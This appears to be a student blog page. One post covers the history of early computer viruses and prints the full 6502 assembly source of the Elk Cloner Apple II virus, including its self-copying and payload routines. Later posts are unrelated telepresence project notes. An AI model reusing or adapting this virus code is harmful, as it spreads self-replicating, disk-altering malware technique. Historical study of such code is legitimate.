A computer virus is a computer program that can copy itself and infect a computer.
The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1971. Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, “I’m the creeper, catch me if you can!” was displayed. The Reaper program was created to delete Creeper.
A program called “Rother J” was the first computer virus to appear “in the wild” — that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skrenta was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning “Elk Cloner: The program with a personality.”
Elk Cloner (circa 1982)
Elk Cloner: The program with a personality It will get on all your disks It will infiltrate your chips Yes it's Cloner! It will stick to you like glue It will modify ram too Send in the Cloner!
ORG $9000 VERSN DFB $02 HIMEM LDA #$FF STA $4C LDA #$8F STA $4D DOPTCH LDA #$20 STA $A180 LDA #$5B STA $A181 LDA #$A7 STA $A182 RUNPTCH LDA #$AD STA $A4D1 LDA #$B6 STA $A4D2 LDA #$AA STA $A4D3 LODPTCH LDA #$4C STA $A413 LDA #>LOD STA $A414 LDA #<LOD STA $A415 BLDPTCH LDA #$4C STA $A35D LDA #>BLOD STA $A35E LDA #<BLOD STA $A35F CATPTCH LDA #$4C STA $A56E LDA #>CATALOG STA $A56F LDA #<CATALOG STA $A570 USRPTCH LDA #$4C STA $0A LDA #>USRCMD STA $0B LDA #<USRCMD STA $0C BOOTUP CLD JSR READ LDX $B3BF INX STX $B3BF JSR WRITE JSR DESTROY JMP $A180 TESTON LDA #$00 STA FLAG1 LDA $AA68 STA $B7EA JSR READ LDA $B3C2 CMP VERSN BEQ TESTON1 LDA #$01 STA FLAG1 TESTON1 RTS LOD JSR TESTON LDA FLAG1 CMP #$00 BEQ LOD1 JSR CLONE LOD1 JSR $A316 JMP $A416 BLOD JSR TESTON LDA FLAG1 CMP #$00 BEQ BLOD1 JSR CLONE BLOD1 JSR $A2A8 JMP $A360 CATALOG JSR TESTON LDA #$06 JSR $A2AA LDA $B5BF STA $AA66 LDA FLAG1 CMP #$00 BEQ RETURN JSR CLONE RETURN LDA #$0 STA $B3BE STA $B3BF STA $B3C0 RTS CLONE CLC JSR READ LDA IDENT STA $B3C0 LDA VERSN STA $B3C2 JSR WRITE LDA $AA68 STA $B7EA LDA #$02 STA $B7F4 STA $B7EC LDA #$08 STA $B7ED LDA #$0 STA $B7EB STA $B7F0 LDA #$95 STA $B7F1 CLONE1 LDA #$B7 LDY #$E8 JSR $B7B5 CLD BCC CLONE2 RTS CLONE2 DEC $B7ED DEC $B7F1 LDA $B7F1 CMP #$8F BNE CLONE1 LDA #$02 STA $B7F1 LDA #$01 STA $B7F4 STA $B7EC LDA #$0 STA $B7ED LDA #$B7 LDY #$E8 JSR $B7B5 CLD BCC CLONE3 RTS CLONE3 LDA #$4C STA $280 LDA #$00 STA $281 LDA #$9B STA $282 LDA #$02 STA $B7F4 LDA #$B7 LDY #$E8 JSR $B7B5 CLD BCC CLONE4 RTS CLONE4 LDA #$0 STA $B7EC LDA #$A STA $B7ED LDA #$95 STA $B7F1 LDA #$B7 LDY #$E8 JSR $B7B5 CLD RTS READ LDA #$01 STA $B7F4 JMP VTOC WRITE LDA #$02 STA $B7F4 VTOC LDA #$11 STA $B7EC LDA #$0 STA $B7ED LDA #$BB STA $B7F0 LDA #$B3 STA $B7F1 LDA #$0 STA $B7EB LDA #$B7 LDY #$E8 JSR $B7B5 CLD RTS PRINT STY $FC STA $FD LDY #$00 PRINT0 LDA ($FC),Y CMP #$00 BEQ PRINT1 JSR $FDED INY JMP PRINT0 PRINT1 RTS PRTMSG LDY #>MSG LDA #<MSG JSR PRINT PRTNUM LDA IDENT STA $44 JSR $AE42 LDA #$8D JSR $FDED RTS MSG ASC 'ELK CLONER V2.0 # ' DFB $0 IDENT DFB $1 FLAG1 DFB $00 RET RTS USRCMD JSR $E6FB CPX #$0B BNE CMD2 JSR PRTMSG RTS CMD2 CPX #$0C BNE CMD3 LDY #>REPORT LDA #<REPORT JSR PRINT JSR READ LDA $B3BF STA $44 JSR $AE42 LDA #$8D JSR $FDED RTS CMD3 CPX #$0D BNE CMD4 JSR CLONE RTS CMD4 CPX #$0A BNE USRERR JSR PRPOEM RTS USRERR LDY #>UERR LDA #<UERR JSR PRINT JSR $FBDD JMP $9DBF UERR DFB $8D ASC 'ILLEGAL QUANTITY ERROR' DFB $0 PRPOEM JSR $FC58 LDY #>POEM LDA #<POEM JSR PRINT RTS REPORT ASC 'BOOT COUNT: ' DFB $0 POEM ASC 'ELK CLONER:' DFB $8D,$8D ASC ' THE PROGRAM WITH A PERSONALITY' DFB $8D,$8D,$8D ASC 'IT WILL GET ON ALL YOUR DISKS' DFB $8D ASC 'IT WILL INFILTRATE YOUR CHIPS' DFB $8D ASC 'YES IT' DFB $A7 ASC 'S CLONER!' DFB $8D,$8D ASC 'IT WILL STICK TO YOU LIKE GLUE' DFB $8D ASC 'IT WILL MODIFY RAM TOO' DFB $8D ASC 'SEND IN THE CLONER!' DFB $8D,$8D,$8D,$8D,$0 IOERR LDY #>ERRMSG LDA #<ERRMSG JSR PRINT JSR $FBDD JMP $9DBF ERRMSG DFB $8D,$8D ASC 'I/O ERROR' DFB $8D,$00 DESTROY LDA $B3BF CMP #10 BNE DEST1 LDA #$69 STA $3F2 LDA #$FF STA $3F3 JSR $FB6F RTS DEST1 CMP #15 BNE DEST2 LDA #$3F STA $32 RTS DEST2 CMP #20 BNE DEST3 LDA $C030 LDA $C030 LDA $C030 RTS DEST3 CMP #25 BNE DEST4 LDA #$7F STA $32 RTS DEST4 CMP #30 BNE DEST5 LDA #'I' STA $B3A7 LDA #'T' STA $B3A8 LDA #'B' STA $B3A9 LDA #'A' STA $B3AA RTS DEST5 CMP #35 BNE DEST6 LDA #$85 STA $AAB2 RTS DEST6 CMP #40 BNE DEST7 LDA #$00 STA $3F2 LDA #$03 STA $3F3 JSR $FB6F LDA #$4C STA $300 LDA #$00 STA $301 LDA #$03 STA $302 RTS DEST7 CMP #45 BNE DEST8 LDA #$80 STA $D6 RTS DEST8 CMP #50 BNE DEST9 LDA #>PRPOEM STA $3F2 LDA #<PRPOEM STA $3F3 JSR $FB6F RTS DEST9 CMP #55 BNE DEST10 LDA #$FF STA $BDD3 RTS DEST10 CMP #60 BNE DEST11 LDA #$20 STA $BDD3 RTS DEST11 CMP #65 BNE DEST12 LDA #$4C STA $A180 LDA #$69 STA $A181 LDA #$FF STA $A182 RTS DEST12 CMP #70 BNE DEST13 LDA #$10 STA $BDD3 RTS DEST13 CMP #75 BNE DEST14 JMP $C600 DEST14 CMP #76 BNE DEST15 JMP $C600 DEST15 CMP #77 BNE DEST16 JMP $C600 DEST16 CMP #78 BNE DEST17 JMP $C600 DEST17 CMP #79 BNE DEST18 JSR READ LDA #$00 STA $B3BF JSR WRITE RTS DEST18 RTS LOADER ORG $9500 LDA #$02 STA $B7EC LDA #$01 STA $B7F4 LDA #$03 STA $B7ED LDA #$0 STA $B7EB STA $B7F0 LDA #$90 STA $B7F1 LOAD1 LDA #$B7 LDY #$E8 JSR $B7B5 INC $B7ED INC $B7F1 LDA $B7F1 CMP #$96 BCC LOAD1 JMP HIMEM
the site of the current project, replacing myself with a bot or threeFebruary 17, 2010 | Comments Off on I’m jut a gigolo Tags: gigolo, Hello World!, I ain't got no body, ideology, individuality, meSofy, persona, project development
10 weeks (last two weeks of the semester are reserved for finishing, dealing with lose ends and unexpected problems, making the documentation website, and preparing the piece for the show)
week 1(by Feb 9) Have Reliable Xbee communication between website and “body” the last run failed after the first few commands were sent. Determine what kind of interaction design should occur between user and body
week 2(by Feb 16) Design and start amassing parts for “body”, should it be able to walk, should it be modular, a space, I don’t know
week 3(by Feb 23) Make trial run (maybe send it to canada and use it to play with sister, or give it to Ben)
week 4(by March 2)revisions/reiteration
week 5(by March 9) one more exchange/test
week 6(by March 16) time to order new/more parts if necessary, change control interface if necessary
week 7(by March 23)next test
week 8(by March 30)recap, re-assesment
week 9(by April 6)build up the project again
week 10(by April 13)document/source code
(my dates don’t seem to coincide with the academic calendar, I don’t care enough to fix them, earlier is better)
The three projects that I feel are successful that are related to mine are the first three slides.
The first slide is a scene from the movie “surrogates” which while being a product of the holywood machine, does have it’s successes. I particularly liked one part in the movie when the antagonist went clubbing in the body of a 20 year old british pop star looking body and met a woman, who was kindof a typical holywood blonde. They liberally flung themselves (or maybe just one of them did), off the side of a building to no harm. They turned into an alley way, and right before the fateful moment of coitus, they were murdered. The young man turned out to be a wheel chair bound decrepit, and the blonde was a clinically overweight man.
It was nice in that the characters were engaging each other as androids and also as the characters in human society that they were representing. Of course the scene was super successful because it was actually played by a sultry hollywood blonde and a young man that looks like a british pop star. Which is further amusing on account of all the recursion, us dealing with actors in the first place and so on.
The second slide is of Golan Levin’s Opto Isolator and Double Take. These robots are following an algorithm that dictates their actions, but they have incredible personality and character. Even of they were commandeered by any stranger they would still be very much driven by the nature of their bodies. And that is one of the aspects of this project that is driving me most, the desire to experience, no matter how remotely, existence in another body,
Next is Adrianne Wortzel’s Kiru from Camouflage Town. Her work centers around robotics and theater. This makes it particularly interesting in that she works on developing specific characters. People from the internet could control Kiru and engage with visitors in the museum, but only through his voice, and body.
The rest of the images are aesthetic inspiration, not conceptual. Although the lunahods and astronaughts whose bodies are monitored down to the heartbeat and sent out into space on behalf of humanity, are quite poignant. The ones on the bottom with men in bug like masks is also an art project, but I don’t remember it’s name, if you do, please write to yud dot sofy at gmail dot com.January 31, 2010 | Leave a Comment Tags: construction of identity, conveyance of meaning, creation of meaning, cyborganism, I ain't got no body, interpretation of meaning, itp, modularizing the human, pcomp, project development, telepresence
I ain’t got no body, continued
How can this be done with love?
The body implemented would be specific in it’s composition, a character by virtue of it’s body, the way a cat is by default different from a snail. But the structure underneath it would be modular and multi purpose. Hopefully allowing me to continue on a path of development for a long run to come.
What: One or more “bodies” to jack into from the net, a net, etc. Possibly even, (and this has always been a fantasy of mine) a space. What does it mean about our experience of the world if our body is mapped to a space?
When: First Plateau: Develop protocol and plan for documentation etc.
Why: I always wondered what it would be like to be a carp, so flat and smooth, on the bottom of the sea floor. How do we map a carp’s body to that of a human?
Because I feel empty and I want to look at everything in such depth that maybe I will finally prove or disprove the reality of anything that I perceive. At least for the benefit of my own peace of mind, if nothing else.
To exacerbate the abyss of the other, push to the limit any indication that they really exist. Trying to mediate life with a mechanical process. Trying to mechanize deconstruct and decontextualize everything.
Who: Anyone with internet, should it be p2p? All access all the time, peep show 2.0 or something more specific you have to make an appointment for etc?
How: Serially enabled devices can be controlled from the internet, we will see which ones and how after some market research and analysis.
I am proposing to develop an open interface for telepresence, with some kind of modular infrastructure. Perhaps it will take the form of something like the chat roulette but with physically present “bodies”. Its related to teledildonics too, and all the beautiful notions of the passion where you give your body over to the process, except that process is embodied by other people, close ones, strangers.
I accept all assignments!
My own perceived strengths:
Some modicum of craftsmanship, some ability to make things work and bring them to a close if not a polish when push comes to shove, can organize workflow, know my limits
Poor language and communication abilities, laziness, don’t know my limits